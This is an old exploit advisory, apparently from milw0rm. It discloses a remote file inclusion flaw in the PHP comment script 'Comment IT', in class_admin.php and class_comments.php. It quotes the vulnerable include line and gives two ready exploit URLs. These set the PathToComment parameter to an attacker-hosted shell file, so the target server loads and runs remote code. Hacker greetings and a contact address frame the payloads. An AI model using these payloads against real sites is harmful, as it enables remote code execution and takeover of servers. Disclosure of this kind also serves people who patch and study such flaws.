Comment IT (class_admin.php , class_comments.php) Remot File Include Vulnerability Found By : CoLd Zero [ Wasem898 ] Palestine Muslim Hacker's ###################################################### # # [ Comment IT ] # # Class: File Include Vulnerability # Published 2006-10-24 # Remote: Yes # Critical Level : Dangerous # Site: http://www.comscripts.com/scripts/php.comment-it.623.html # Author: Cold Zero # Contact: ip.123.456.78.90@hotmail.com # ###################################################### file's ; class_admin.php class_comments.php ====================================================== Vuln Code include_once ($PathToComment."/classes/class_db.php"); ======================================================= Exploit : Http:// www.Victem.0 / [Comment IT_path] /classes/class_admin.php?PathToComment=http://ColdZero-Shell.txt Http:// www.Victem.0 / [Comment IT_path] /classes/class_comments.php?PathToComment=http://ColdZero-Shell.txt ---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] ]organza[ ---- GreeTz: All www.4azhar.Com Members Cont : ip.123.456.78.90@hotmail.com --------------------------------------|| Viva Palestine ||----------------------------------------- # milw0rm.com [2006-10-25]